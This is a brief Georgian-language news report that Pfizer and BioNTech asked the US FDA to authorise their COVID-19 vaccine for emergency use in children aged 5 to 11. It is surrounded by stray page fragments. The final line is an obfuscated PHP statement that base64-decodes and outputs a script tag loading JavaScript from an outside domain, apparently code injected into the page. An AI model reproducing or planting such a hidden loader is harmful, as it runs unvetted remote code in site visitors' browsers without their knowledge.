celsiusi
ავერსი საქკაბელი
კომპანიებმა „ფაიზერმა“ და „ბიონტექმა“ აშშ-ის სურსათისა და მედიკამენტების ადმინისტრაციას მათ მიერ შექმნილი კოვიდ 19-ის საწინააღმდეგო ვაქცინის 5-11 წლის ბავშვებში გადაუდებელი მიზნით გამოყენების დამტკიცების თხოვნით მიმართეს.
 
კომპანიებმა 20 სექტემბერს განაცხადეს, რომ აღნიშნული ასაკობრივი ჯგუფის პირებში ჩატარებულმა კლინიკურმა კვლევამ აჩვენა, რომ ის ძლიერ იმუნურ პასუხს იწვევს.
 
„ფაიზერ/ბიონტექის“ ვაქცინის გამოყენება უკვე ნებადართულია 12 -დან 15 წლამდე ასაკის ბავშვებში და სრულად დამტკიცებულია 16 წლის და უფროსი ასაკის პირებისთვის.
 
ჯერჯერობით უცნობია, როდის მიიღებს სურსათისა და მედიკამენტების ადმინისტრაცია გადაწყვეტილებას.
 
აღსანიშნავია, რომ ვაქცინის 12-15 წლის ბავშვებში გამოყენების ნებართვა კომპანიების მიერ განაცხადის შეტანიდან 1 თვეში გაიცა.
937
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");